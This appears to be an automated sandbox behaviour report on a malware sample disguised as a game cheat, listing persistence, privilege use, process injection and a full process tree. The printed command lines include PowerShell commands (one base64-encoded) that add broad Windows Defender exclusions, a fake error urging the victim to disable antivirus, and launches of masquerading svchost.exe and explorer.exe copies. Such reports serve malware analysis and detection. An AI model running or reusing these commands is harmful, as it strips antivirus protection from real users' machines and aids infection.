Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\windowshost.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\driverPerf\cominto.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1892 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3412 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3412 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3412 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 760 wrote to memory of 1180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 1180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 1180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3980 wrote to memory of 1500 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe
PID 3980 wrote to memory of 1500 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe
PID 3980 wrote to memory of 1500 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe
PID 3508 wrote to memory of 2284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3508 wrote to memory of 2284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3508 wrote to memory of 2284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4908 wrote to memory of 1640 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 4908 wrote to memory of 1640 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 3412 wrote to memory of 1532 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\windowshost.exe
PID 3412 wrote to memory of 1532 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\windowshost.exe
PID 3412 wrote to memory of 1532 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\windowshost.exe
PID 3600 wrote to memory of 2012 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 3600 wrote to memory of 2012 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 1532 wrote to memory of 3084 N/A C:\Users\Admin\AppData\Local\Temp\windowshost.exe C:\Windows\SysWOW64\WScript.exe
PID 1532 wrote to memory of 3084 N/A C:\Users\Admin\AppData\Local\Temp\windowshost.exe C:\Windows\SysWOW64\WScript.exe
PID 1532 wrote to memory of 3084 N/A C:\Users\Admin\AppData\Local\Temp\windowshost.exe C:\Windows\SysWOW64\WScript.exe
PID 3084 wrote to memory of 2156 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 3084 wrote to memory of 2156 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 3084 wrote to memory of 2156 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2156 wrote to memory of 4440 N/A C:\Windows\SysWOW64\cmd.exe C:\driverPerf\cominto.exe
PID 2156 wrote to memory of 4440 N/A C:\Windows\SysWOW64\cmd.exe C:\driverPerf\cominto.exe
PID 3508 wrote to memory of 1620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3508 wrote to memory of 1620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3508 wrote to memory of 1620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 4340 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\conhost.exe
PID 1640 wrote to memory of 4340 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\conhost.exe
PID 1640 wrote to memory of 4340 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\conhost.exe
PID 2012 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\conhost.exe
PID 2012 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\conhost.exe
PID 2012 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\conhost.exe
PID 4340 wrote to memory of 3596 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 4340 wrote to memory of 3596 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 4308 wrote to memory of 1432 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 4308 wrote to memory of 1432 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 3596 wrote to memory of 1352 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3596 wrote to memory of 1352 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1432 wrote to memory of 2440 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1432 wrote to memory of 2440 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4308 wrote to memory of 1468 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 4308 wrote to memory of 1468 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 4308 wrote to memory of 1472 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 4308 wrote to memory of 1472 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1468 wrote to memory of 1656 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe

"C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Error #103 Cheat cannot start properly because antivirus is not disabled. Please disable antivirus and re-download the cheat.','Error','OK','Error')"

C:\Windows\SysWOW64\cmd.exe

cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\SysWOW64\cmd.exe

cmd /c start C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c start C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c start C:\Users\Admin\AppData\Local\Temp\explorer.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c start C:\Users\Admin\AppData\Local\Temp\windowshost.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Error #103 Cheat cannot start properly because antivirus is not disabled. Please disable antivirus and re-download the cheat.','Error','OK','Error')"

C:\Users\Admin\AppData\Local\Temp\explorer.exe

C:\Users\Admin\AppData\Local\Temp\explorer.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Users\Admin\AppData\Local\Temp\windowshost.exe

C:\Users\Admin\AppData\Local\Temp\windowshost.exe

C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\driverPerf\DDCzSbk7D28EdFKaphOM.vbe"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\driverPerf\lG0LQTEIJKvWsYHAg5CgQ5boB.bat" "

C:\driverPerf\cominto.exe

"C:\driverPerf\cominto.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

